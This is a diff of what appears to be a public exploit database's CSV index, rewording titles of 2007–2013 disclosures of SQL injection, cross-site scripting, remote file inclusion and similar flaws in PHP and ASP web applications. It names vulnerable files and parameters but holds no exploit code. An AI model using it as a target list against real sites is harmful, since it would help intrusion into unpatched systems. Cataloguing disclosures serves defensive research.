-30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 - (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 - (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/Authenticate.php sUName Parameter Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 -30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 -30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 - (PHPJK) G_Display.php Multiple Parameter Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 -30118,platforms/php/webapps/30118.txt,"Prototype of an PHP Application 0.1 - gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30119,platforms/php/webapps/30119.txt,"Prototype of an PHP Application 0.1 - ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30120,platforms/php/webapps/30120.txt,"Prototype of an PHP Application 0.1 - ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30121,platforms/php/webapps/30121.txt,"Prototype of an PHP Application 0.1 - ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30122,platforms/php/webapps/30122.txt,"Prototype of an PHP Application 0.1 - ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30123,platforms/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30124,platforms/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30125,platforms/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30126,platforms/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - Parameter/Parameter.inc.php path_inc Parameters Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30127,platforms/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - plugins/PHPgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php?iCategoryUnq' SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 +30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 - '(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 +30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 - '(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 +30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 - '(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 +30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-31,"laurent gaffie",php,webapps,0 +30118,platforms/php/webapps/30118.txt,"Prototype of an PHP Application 0.1 - 'gestion/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30119,platforms/php/webapps/30119.txt,"Prototype of an PHP Application 0.1 - 'ident/identification.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30120,platforms/php/webapps/30120.txt,"Prototype of an PHP Application 0.1 - 'ident/disconnect.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30121,platforms/php/webapps/30121.txt,"Prototype of an PHP Application 0.1 - 'ident/loginliste.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30122,platforms/php/webapps/30122.txt,"Prototype of an PHP Application 0.1 - 'ident/loginmodif.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30123,platforms/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - 'ident/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30124,platforms/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - 'ident/ident.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30125,platforms/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - 'menu/menuprincipal.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30126,platforms/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - 'Parameter/Parameter.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30127,platforms/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - 'plugins/PHPgacl/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30128,platforms/php/webapps/30128.txt,"Prototype of an PHP Application 0.1 - 'index.php' path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30129,platforms/php/webapps/30129.txt,"Prototype of an PHP Application 0.1 - common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30129,platforms/php/webapps/30129.txt,"Prototype of an PHP Application 0.1 - 'common.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30131,platforms/php/webapps/30131.txt,"Buttercup WFM - Title Parameter Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps,0 -30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site script",2007-06-01,"Glafkos Charalambous",php,webapps,0 -30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 - chat.php sid Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 - help.php Multiple Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - admin/header.php admin[name] Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - 'super/info.php BASE_URL' Parameter Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - setup/footer.php Multiple Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site Scripting",2007-06-01,"Glafkos Charalambous",php,webapps,0 +30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 - 'chat.php?sid' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps,0 +30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - 'admin/header.php?admin[name]' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - 'super/info.php?BASE_URL' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - 'setup/footer.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps,0 30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 - 'index.php' Cross-Site Scripting",2007-06-02,vagrant,php,webapps,0 30140,platforms/php/webapps/30140.txt,"Okyanusmedya - 'index.php' Cross-Site Scripting",2007-06-04,vagrant,php,webapps,0 30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 - Haberoku.asp SQL Injection",2007-06-04,ertuqrul,asp,webapps,0 30143,platforms/php/webapps/30143.txt,"WebStudio CMS - 'index.php' Cross-Site Scripting",2007-06-04,"Glafkos Charalambous",php,webapps,0 30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent Exploit",2013-12-08,Vulnerability-Lab,ios,webapps,0 30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 -30152,platforms/php/webapps/30152.txt,"My Databook - diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 -30153,platforms/php/webapps/30153.txt,"My Databook - diary.php year Parameter Cross-Site Scripting",2007-06-04,Serapis.net,php,webapps,0 +30152,platforms/php/webapps/30152.txt,"My Databook - 'diary.php?delete' SQL Injection",2007-06-04,Serapis.net,php,webapps,0 +30153,platforms/php/webapps/30153.txt,"My Databook - 'diary.php?year' Cross-Site Scripting",2007-06-04,Serapis.net,php,webapps,0 30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery - Download_Script.asp Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 30161,platforms/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - AtomPhotoblog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous",php,webapps,0 -30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - Okul Portal Haber_Oku.asp SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 -30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - 'Request_URI' Parameter Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 +30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - 'Okul Portal Haber_Oku.asp' SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 +30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - 'Request_URI' Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - vBSupport.php SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 -30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - 'auth.php' Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 -30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter Cross-Site Scripting",2007-06-11,"Tim Brown",php,webapps,0 +30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - 'auth.php' Multiple SQL Injections",2007-06-11,"Tim Brown",php,webapps,0 +30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - 'auth.php?user' Cross-Site Scripting",2007-06-11,"Tim Brown",php,webapps,0 30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 - admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 - admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 30175,platforms/php/webapps/30175.txt,"bbPress 0.8.1 - BB-login.php Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 @@ -31568,11 +31569,11 @@ id,file,description,date,author,platform,type,port 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz - 'index.php' Cross-Site Scripting",2007-04-10,hackberry,php,webapps,0 29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion",2007-04-10,hackberry,php,webapps,0 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 -29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 -29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 +29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - 'search.php?delete Action id' SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 +29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - 'editlogcal.php?save Action calories' SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps,0 -29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php post_id' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 -29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php tool_url' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 +29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 +29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 @@ -31593,24 +31594,24 @@ id,file,description,date,author,platform,type,port 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections",2007-04-17,Aleksandar,php,webapps,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 -29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 -29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 -29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php icodir' Parameter Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 +29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - 'magpie_debug.php?url' Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 +29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 +29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php?icodir' Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion",2007-04-20,Omni,php,webapps,0 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 - You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 -29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 +29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - 'contact/index.php?ripeformpost' SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 -29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 +29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusions",2007-04-23,InyeXion,php,webapps,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29883,platforms/php/webapps/29883.txt,"ACVSWS - 'Transport.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 -29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 -29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - admin.php modsettings Module smiley_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 -29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 -29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php module[]' Parameter Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 -29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 - include/admin/banlist.php delete Parameter Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 +29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - 'admin.php?Groups Module group_id' Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 +29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - 'admin.php?modsettings Module smiley_id' Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 +29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - 'include/controlcenter/users.php' Multiple Method Privilege Escalations",2007-04-23,"Janek Vind",php,webapps,0 +29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php?module[]' Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 +29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 - 'include/admin/banlist.php?delete' Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 - pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 @@ -31618,13 +31619,13 @@ id,file,description,date,author,platform,type,port 29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - 'login.php3' Directory Traversal",2007-04-25,anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29903,platforms/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusion",2007-04-25,CodeXpLoder'tq,php,webapps,0 +29903,platforms/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusions",2007-04-25,CodeXpLoder'tq,php,webapps,0 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29907,platforms/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29908,platforms/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion",2007-04-25,s3rv3r_hack3r,php,webapps,0 -29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29908,platforms/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusions",2007-04-25,s3rv3r_hack3r,php,webapps,0 +29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusions",2007-04-25,alijsb,php,webapps,0 29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 @@ -31635,7 +31636,7 @@ id,file,description,date,author,platform,type,port 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang Parameter) XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0 29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - Cross-Site Request Forgery",2013-11-30,"mohammed al-saggaf",hardware,webapps,0 -29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery",2013-11-30,sajith,hardware,webapps,0 +29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-30,sajith,hardware,webapps,0 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - BRY.asp SQL Injection",2007-04-26,RMx,asp,webapps,0 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal - Down_Indir.asp SQL Injection",2007-04-30,ertuqrul,asp,webapps,0 29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 @@ -31649,53 +31650,53 @@ id,file,description,date,author,platform,type,port 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0 -29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 -29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 -29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 +29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - 'order_form.php?PATH_INFO' Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 +29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 +29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0 -29960,platforms/php/webapps/29960.txt,"SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 +29960,platforms/php/webapps/29960.txt,"SunShop Shopping Cart 4.0 - 'index.php' Multiple SQL Injections",2007-05-07,"John Martinelli",php,webapps,0 29961,platforms/php/webapps/29961.txt,"SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - index.pl Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 -29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29969,platforms/php/webapps/29969.txt,"Campsite 2.6.1 - ArticleComment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29970,platforms/php/webapps/29970.txt,"Campsite 2.6.1 - ArticleData.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29971,platforms/php/webapps/29971.txt,"Campsite 2.6.1 - ArticleImage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29972,platforms/php/webapps/29972.txt,"Campsite 2.6.1 - ArticleIndex.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29973,platforms/php/webapps/29973.txt,"Campsite 2.6.1 - ArticlePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29974,platforms/php/webapps/29974.txt,"Campsite 2.6.1 - ArticleTopic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29975,platforms/php/webapps/29975.txt,"Campsite 2.6.1 - ArticleType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29976,platforms/php/webapps/29976.txt,"Campsite 2.6.1 - ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29977,platforms/php/webapps/29977.txt,"Campsite 2.6.1 - Country.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29978,platforms/php/webapps/29978.txt,"Campsite 2.6.1 - DatabaseObject.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29979,platforms/php/webapps/29979.txt,"Campsite 2.6.1 - Event.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29980,platforms/php/webapps/29980.txt,"Campsite 2.6.1 - IPAccess.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29981,platforms/php/webapps/29981.txt,"Campsite 2.6.1 - image.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29982,platforms/php/webapps/29982.txt,"Campsite 2.6.1 - issue.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29983,platforms/php/webapps/29983.txt,"Campsite 2.6.1 - IssuePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29984,platforms/php/webapps/29984.txt,"Campsite 2.6.1 - Language.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29985,platforms/php/webapps/29985.txt,"Campsite 2.6.1 - Log.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29986,platforms/php/webapps/29986.txt,"Campsite 2.6.1 - LoginAttempts.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29987,platforms/php/webapps/29987.txt,"Campsite 2.6.1 - Publication.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29988,platforms/php/webapps/29988.txt,"Campsite 2.6.1 - Section.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29989,platforms/php/webapps/29989.txt,"Campsite 2.6.1 - ShortURL.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 